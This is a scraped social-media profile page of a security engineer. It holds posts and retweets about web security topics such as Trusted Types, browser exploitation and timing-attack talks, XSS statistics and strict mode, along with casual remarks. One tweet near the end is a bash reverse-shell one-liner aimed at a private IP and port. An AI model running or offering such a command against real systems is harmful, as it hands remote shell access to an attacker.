Roman Shafigullin

2.6K posts

Roman Shafigullin banner
Roman Shafigullin

Roman Shafigullin

@shafigullin

Security at LinkedIn

Sunnyvale, CA Katılım Nisan 2009
908 Takip Edilen5.7K Takipçiler
Sabitlenmiş Tweet
Roman Shafigullin
Roman Shafigullin@shafigullin·
✅︎ Trusted Types
Roman Shafigullin tweet media
English
1
2
25
4.1K
Roman Shafigullin
Roman Shafigullin@shafigullin·
When adding one line of code takes months :D
Roman Shafigullin tweet media
English
0
0
2
522
Roman Shafigullin retweetledi
Nat Friedman
Nat Friedman@natfriedman·
Full results and write-up: plasticlist.org We also have instructions for running your own tests!
English
85
383
2.7K
389.3K
Roman Shafigullin retweetledi
Alisa Esage Шевченко
Alisa Esage Шевченко@alisaesage·
Releasing full 2+hr video of my browser exploitation workshop from VXCON 2024: youtube.com/live/b9OhamkAY… In which I show what goes inside the mind of a skilled hacker while exploiting a highly non-trivial vulnerability in v8, from zero to exploit concept. Especially this workflow requires advanced abstract thinking, thereby emphasize the role of theoretical modeling in attacking hard zeroday research targets, which is a part of why it's fun. @zerodaytraining
YouTube video
YouTube
English
8
242
701
41.1K
Roman Shafigullin retweetledi
James Kettle
James Kettle@albinowax·
We’re finally live! You can now watch “Listen to the whispers: web timing attacks that actually work” on YouTube: youtube.com/watch?v=zOPjz-…
YouTube video
YouTube
English
4
92
313
27.9K
Roman Shafigullin
Roman Shafigullin@shafigullin·
@audiblesupport @audible_com fyi, during login on ios when app asks for otp, if you go to messages and return you see error and start login from beginning, i had to get otp via call to not loose ficus on the app
Roman Shafigullin tweet media
English
0
0
0
52
Roman Shafigullin retweetledi
MDN Web Docs
MDN Web Docs@MozDevNet·
Did you know about Strict Mode? 🤔 ✨ "use strict"; ✨ Strict Mode catches silent errors, making your code more predictable and easier to debug. It also improves performance and helps you write more secure JavaScript code. See how 👇 developer.mozilla.org/en-US/docs/Web…
English
1
5
20
1.8K
Roman Shafigullin retweetledi
Lukas Weichselbaum
Lukas Weichselbaum@we1x·
The dedication and hard work has payed off: "for hundreds of complex web applications that are built on Google’s hardened and safe-by-design frameworks, we've averaged less than one XSS report per year in total" (see page 9 of the whitepaper).
Heather Adkins - Ꜻ - Spes consilium non est@argvee

Secure by design takes dedication and years of hard work to get the balance right between velocity and safety. Read a bit about @Google’s commitment and journey in our new white paper. Humbled to work with the professionals that make this happen everyday. blog.google/technology/saf…

English
3
6
27
5K
Roman Shafigullin
Roman Shafigullin@shafigullin·
@ericlaw I heard that before, bank design security to protect bank’s money, not people’s money
English
0
0
0
25
🎻 ➡️ BlueSky
🎻 ➡️ BlueSky@ericlaw·
"There's no option to turn this off, again, because we're moving your money, not ours."
English
1
0
0
342
Jake Archibald
Jake Archibald@jaffathecake·
I just asked for a whiskey and coke at a Scottish wedding and fuuuck I haven't felt hate like that since I was devrel for a large company
English
19
3
242
22.1K
Roman Shafigullin
Roman Shafigullin@shafigullin·
bash -i >& /dev/tcp/192.168.119.3/4444 0>&1
Roman Shafigullin tweet mediaRoman Shafigullin tweet media
Čeština
0
0
0
350
Roman Shafigullin
Roman Shafigullin@shafigullin·
How Americans call acidic drink? Soda
English
1
0
1
281